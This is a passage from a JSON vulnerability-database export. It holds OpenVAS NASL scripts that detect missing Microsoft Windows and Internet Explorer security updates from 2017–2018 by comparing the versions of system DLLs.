"CVE-2017-11913", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11885", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11918", "CVE-2017-11899", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11910", "CVE-2017-11927", "CVE-2017-11894", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812334", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812334", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4053581)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812334\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11885\", \"CVE-2017-11907\", \"CVE-2017-11910\", \"CVE-2017-11912\",\n \"CVE-2017-11886\", \"CVE-2017-11887\", \"CVE-2017-11888\", \"CVE-2017-11889\",\n \"CVE-2017-11890\", \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11899\",\n \"CVE-2017-11901\", \"CVE-2017-11903\", \"CVE-2017-11906\", \"CVE-2017-11913\",\n \"CVE-2017-11918\", \"CVE-2017-11919\", \"CVE-2017-11927\", \"CVE-2017-11930\");\n script_bugtraq_id(102055, 102045, 102086, 102092, 102062, 102063, 102065, 102080,\n 102082, 102053, 102054, 102077, 102046, 102047, 102078, 102091,\n 102089, 102093, 102095, 102058);\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-12-13 10:08:48 +0530 (Wed, 13 Dec 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4053581)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4053581\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in RPC if the server has Routing and Remote Access enabled.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error when Internet Explorer improperly handles objects in memory.\n\n - An error when the Windows its:// protocol handler unnecessarily sends traffic\n to a remote site in order to determine the zone of a provided URL.\n\n - An error when Microsoft Edge improperly accesses objects in memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - A security feature bypass exists when Device Guard incorrectly validates an\n untrusted file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, gain the same user rights as the current user, obtain\n sensitive information to further compromise the user's system, a brute-force\n to disclose the NTLM hash password and make an unsigned file appear to be signed.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for x64-based Systems\n\n - Microsoft Windows 10 for 32-bit Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4053581\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17708\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.17708\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:55:30", "description": "This host is missing a critical security\n update according to Microsoft KB4054519", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4054519)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11903", "CVE-2017-11919", "CVE-2017-11913", "CVE-2017-11890", "CVE-2017-11885", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11927", "CVE-2017-11894", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310812244", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812244", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4054519)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812244\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-11885\", \"CVE-2017-11886\", \"CVE-2017-11887\", \"CVE-2017-11890\",\n \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11901\", \"CVE-2017-11903\",\n \"CVE-2017-11906\", \"CVE-2017-11907\", \"CVE-2017-11912\", \"CVE-2017-11913\",\n \"CVE-2017-11919\", \"CVE-2017-11927\", \"CVE-2017-11930\");\n script_bugtraq_id(102055, 102062, 102063, 102082, 102053, 102054, 102046, 102047,\n 102078, 102045, 102092, 102091, 102093, 102095, 102058);\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-13 09:23:14 +0530 (Wed, 13 Dec 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4054519)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4054519\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in RPC if the server has Routing and Remote Access enabled.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Internet Explorer improperly handles objects in memory.\n\n - Scripting engine handles objects in memory in Microsoft browsers.\n\n - Windows its:// protocol handler unnecessarily sends traffic to a remote\n site in order to determine the zone of a provided URL.\n\n - Scripting engine does not properly handle objects in memory in Microsoft\n browsers.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited this vulnerability to execute code on the target\n system, gain the same user rights as the current user, obtain information to\n further compromise the user's system and could attempt a brute-force attack to\n disclose the password.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4054519\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.18872\"))\n{\n report = report_fixed_ver( file_checked:sysPath + \"\\Win32k.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 6.3.9600.18872\" );\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "description": "This host is missing a critical security\n update according to Microsoft KB4054518", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4054518)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11903", "CVE-2017-11919", "CVE-2017-11913", "CVE-2017-11890", "CVE-2017-11885", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11927", "CVE-2017-11894", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812245", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812245", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4054518)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812245\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11885\", \"CVE-2017-11886\", \"CVE-2017-11887\", \"CVE-2017-11890\",\n \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11901\", \"CVE-2017-11903\",\n \"CVE-2017-11906\", \"CVE-2017-11907\", \"CVE-2017-11912\", \"CVE-2017-11913\",\n \"CVE-2017-11919\", \"CVE-2017-11927\", \"CVE-2017-11930\");\n script_bugtraq_id(102055, 102062, 102063, 102082, 102053, 102054, 102046, 102047,\n 102078, 102045, 102092, 102091, 102093, 102095, 102058);\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-12-13 09:40:51 +0530 (Wed, 13 Dec 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4054518)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4054518\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in RPC if the server has Routing and Remote Access enabled.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Internet Explorer improperly handles objects in memory.\n\n - Scripting engine handles objects in memory in Microsoft browsers.\n\n - Windows its:// protocol handler unnecessarily sends traffic to a remote site\n in order to determine the zone of a provided URL.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited this vulnerability to execute code on the target\n system, gain the same user rights as the current user, obtain information to\n further compromise the user's system and could attempt a brute-force attack to\n disclose the password.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\n\n - Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4054518\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008r2:2, win7:2, win7x64:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.23963\"))\n{\n report = report_fixed_ver( file_checked:sysPath + \"\\Win32k.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.23963\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:33", "description": "This host is missing a critical security\n update according to Microsoft security updates KB4052978.", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (KB4052978)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11903", "CVE-2017-11919", "CVE-2017-11913", "CVE-2017-11890", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11894", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812336", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812336", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (KB4052978)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812336\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11907\", \"CVE-2017-11912\", \"CVE-2017-11886\", \"CVE-2017-11887\",\n \"CVE-2017-11890\", \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11901\",\n \"CVE-2017-11903\", \"CVE-2017-11906\", \"CVE-2017-11913\", \"CVE-2017-11919\",\n \"CVE-2017-11930\");\n script_bugtraq_id(102045, 102092, 102062, 102063, 102082, 102053, 102054, 102046,\n 102047, 102078, 102091, 102093, 102058);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-12-13 10:40:44 +0530 (Wed, 13 Dec 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (KB4052978)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft security updates KB4052978.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple errors in Internet Explorer which improperly accesses objects in\n memory.\n\n - Multiple errors when Internet Explorer improperly handles objects in memory.\n\n - Multiple errors exists in the way the scripting engine handles objects in\n memory in Microsoft browsers.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code in the context of the current user, gain the same\n user rights as the current user and obtain sensitive information to further\n compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 9.x, 10.x and 11.x.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4052978\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3, win7:2, win7x64:2, win2008r2:2, win2012:1, win2012R2:1,\n win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^(9|10|11)\"){\n exit(0);\n}\n\niePath = smb_get_system32root();\nif(!iePath ){\n exit(0);\n}\n\niedllVer = fetch_file_version(sysPath:iePath, file_name:\"Mshtml.dll\");\nif(!iedllVer){\n exit(0);\n}\n\n##Server 2008\nif(hotfix_check_sp(win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"9.0.8112.21084\")){\n Vulnerable_range = \"Less than 9.0.8112.21084\";\n }\n}\n\n# Win 2012\nelse if(hotfix_check_sp(win2012:1) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"10.0.9200.22314\")){\n Vulnerable_range = \"Less than 10.0.9200.22314\";\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1, win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"11.0.9600.18860\")){\n Vulnerable_range = \"Less than 11.0.9600.18860\";\n }\n}\n\nif(Vulnerable_range)\n{\n report = report_fixed_ver(file_checked:iePath + \"\\Mshtml.dll\",\n file_version:iedllVer, vulnerable_range:Vulnerable_range);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:06", "description": "This host is missing a critical security\n update according to Microsoft KB4103718", "cvss3": {}, "published": "2018-05-09T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4103718)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-0959", "CVE-2018-8174", "CVE-2018-8136", "CVE-2018-0824", "CVE-2018-8164", "CVE-2018-8178", "CVE-2018-0955", "CVE-2018-0954", "CVE-2018-8127", "CVE-2018-8124", "CVE-2018-8145", "CVE-2018-8897", "CVE-2018-8122", "CVE-2018-8167", "CVE-2018-8166", "CVE-2017-11927", "CVE-2018-0886", "CVE-2018-1022", "CVE-2018-8114", "CVE-2018-8120", "CVE-2018-1025"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310813336", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813336", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4103718)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813336\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0954\", \"CVE-2018-0955\", \"CVE-2018-0959\", \"CVE-2018-1022\",\n \"CVE-2018-1025\", \"CVE-2018-8114\", \"CVE-2018-8120\", \"CVE-2018-8122\",\n \"CVE-2018-8124\", \"CVE-2018-8127\", \"CVE-2018-8136\", \"CVE-2018-8145\",\n \"CVE-2018-8164\", \"CVE-2018-8166\", \"CVE-2018-8167\", \"CVE-2018-8174\",\n \"CVE-2018-8178\", \"CVE-2018-8897\", \"CVE-2018-0824\", \"CVE-2017-11927\",\n \"CVE-2018-0886\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 08:12:54 +0530 (Wed, 09 May 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4103718)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4103718\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Microsoft browsers improperly access objects in memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - Windows kernel fails to properly handle objects in memory.\n\n - The VBScript engine improperly handles objects in memory.\n\n - The scripting engine improperly handles objects in memory in Microsoft browsers.\n\n - Windows Common Log File System (CLFS) driver improperly handles objects in memory.\n\n - Chakra improperly discloses the contents of its memory.\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Windows 'its://' protocol handler unnecessarily sends traffic to a remote site\n in order to determine the zone of a provided URL.\n\n - An error in Credential Security Support Provider protocol (CredSSP).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to gain the same user rights as the current user, run arbitrary\n code, disclose sensitive information and run processes in an elevated context\n and it may lead to further compromise of the system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4103718\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"advapi32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.24117\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\advapi32.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.24117\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:29:07", "description": "This host is missing a critical security\n update according to Microsoft KB4103725", "cvss3": {}, "published": "2018-05-09T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4103725)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-0959", "CVE-2018-8174", "CVE-2018-8134", "CVE-2018-8136", "CVE-2018-0824", "CVE-2018-8164", "CVE-2018-8178", "CVE-2018-0955", "CVE-2018-0954", "CVE-2018-8127", "CVE-2018-8124", "CVE-2018-8145", "CVE-2018-8897", "CVE-2018-8122", "CVE-2018-8167", "CVE-2018-8166", "CVE-2017-11927", "CVE-2018-0886", "CVE-2018-1022", "CVE-2018-8114", "CVE-2018-1025"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310813338", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813338", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4103725)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813338\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-0954\", \"CVE-2018-0955\", \"CVE-2018-0959\", \"CVE-2018-1022\",\n \"CVE-2018-1025\", \"CVE-2018-8114\", \"CVE-2018-8122\", \"CVE-2018-8124\",\n \"CVE-2018-8127\", \"CVE-2018-8134\", \"CVE-2018-8136\", \"CVE-2018-8145\",\n \"CVE-2018-8164\", \"CVE-2018-8166\", \"CVE-2018-8167\", \"CVE-2018-8174\",\n \"CVE-2018-8178\", \"CVE-2018-8897\", \"CVE-2018-0824\", \"CVE-2018-0886\",\n \"CVE-2017-11927\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 08:59:54 +0530 (Wed, 09 May 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4103725)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4103725\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due 